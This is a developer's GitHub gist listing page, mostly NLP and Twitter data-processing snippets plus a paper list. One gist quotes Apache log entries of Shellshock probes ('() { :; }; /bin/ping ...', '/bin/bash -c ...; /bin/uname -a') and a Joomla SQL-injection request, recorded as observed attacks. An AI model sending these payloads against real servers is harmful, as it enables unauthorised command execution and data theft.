Skip to content

Instantly share code, notes, and snippets.

View brendano's full-sized avatar

Brendan O'Connor brendano

View GitHub Profile
r"""
stdin: IDs of tweets to get (whitespace or line separated)
stdout: the tweets as two-column TSV: ID \t TweetJSON
This retrieves tweets using the API.
If there was an error when retrieving a message - most prominently, if the
message is now deleted -- the error information is saved as JSON. Therefore
there should be exactly as many output lines as there are input IDs.
# -*- encoding: utf-8 -*-
# actually that encoding line is NOT important codewise. only for doc purposes.
"""
Detect emoji or other emoji-like things in Python.
The regular expressions here can be used to either identify emoji or to remove it.
The comments are written from the perspective of removing it.
The regexes get some stuff besides emoji.
by Brendan O'Connor (http://brenocon.com) 2016-10-20
originally written as part of https://arxiv.org/abs/1608.08868
# by brendan o'connor (http://brenocon.com) written in early 2012
# parallelized collapsed gibbs sampling for LDA with threads in cython
# need to delete these lines to get the cython instructions to work...
#cython: boundscheck=False, cdivision=True
# vim:sts=4:sw=4
import numpy as np
cimport numpy as np
cimport cython
cimport openmp
@brendano
brendano / gist:2a90765581e88c8b1b16
Last active October 20, 2015 18:47
munge H:M:S and M:S into seconds for zsh time command with ruby regexes
For example for data looking like
qwerasdvzxcasdf 0.62s user 18.55s system 92% cpu 20.678 total
asdfasdf 838.56s user 10.75s system 100% cpu 14:08.98 total
acvzxcvzxcv 3:15:12.2 total
asdfadsf 0.22s user 6.24s system 0% cpu 16:01.30 total
output those 4 numbers in seconds
20.678
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
#!/usr/bin/env python
import sys,os,re,json
from hose_util import iterate, lookup
# import geodb
# country_db = geodb.GeoDB.load_geojson_files(['/home/brenocon/geocode/tm_world_borders-0.3.json'])
OneCoord = r'([-+]?\d{1,3}\.\d{3,})'
Separator= r', ?'
LatLong = re.compile(OneCoord + Separator + OneCoord, re.U)
@brendano
brendano / -
Created October 27, 2014 21:16
tw2created_at_iso.py
#!/usr/bin/env python
import ujson as json
import time,sys
from datetime import datetime
def parse_date(twitter_lame_datetime_string):
# e.g. the 'created_at' field
ts = time.strptime(twitter_lame_datetime_string, "%a %b %d %H:%M:%S +0000 %Y")
return datetime(*ts[:7])
Shellshock attack attempts I noticed in apache logs, from grep '()' ... the shellshock-scan one I think I initiated but I think the rest are attack attempts.
209.126.230.72 - - [24/Sep/2014:22:55:07 -0400] "GET / HTTP/1.0" 301 - "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
94.228.220.68 - - [25/Sep/2014:01:17:15 -0400] "GET /index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,4,5,group_concat(0x3C6B65793E,version(),0x3C6B6579733E)-- HTTP/1.1" 200 31516 "-" "-"
89.207.135.125 - - [25/Sep/2014:06:59:58 -0400] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 302 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
198.20.69.74 - - [25/Sep/2014:17:14:32 -0400] "GET / HTTP/1.1" 301 - "() { :; }; /bin/ping -c 1 104.131.0.69" "() { :; }; /bin/ping -c 1 104.131.0.69"
54.251.83.67 - - [26/Sep/2014:15:55:50 -0400] "GET / HTTP/1.1" 301 - "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
114.91.105.103 - -
~ % cat bla
digraph A {
0 [label = "hello\\"]
}
~ % dot -Tpdf bla > out.pdf
===> http://brenocon.com/20141005_dot.pdf
@brendano
brendano / gist:963c826e7109a5e50d54
Created July 3, 2014 16:50
papers that do NLP-like stuff with source code
NLP and source code papers, very scattered and partial listing
(collected by Nathan Schneider and Brendan O'Connor)
ICML 2014
Maddison and Tarlow
Structured Generative Models of Natural Source Code
http://jmlr.org/proceedings/papers/v32/maddison14.pdf
ACL 2013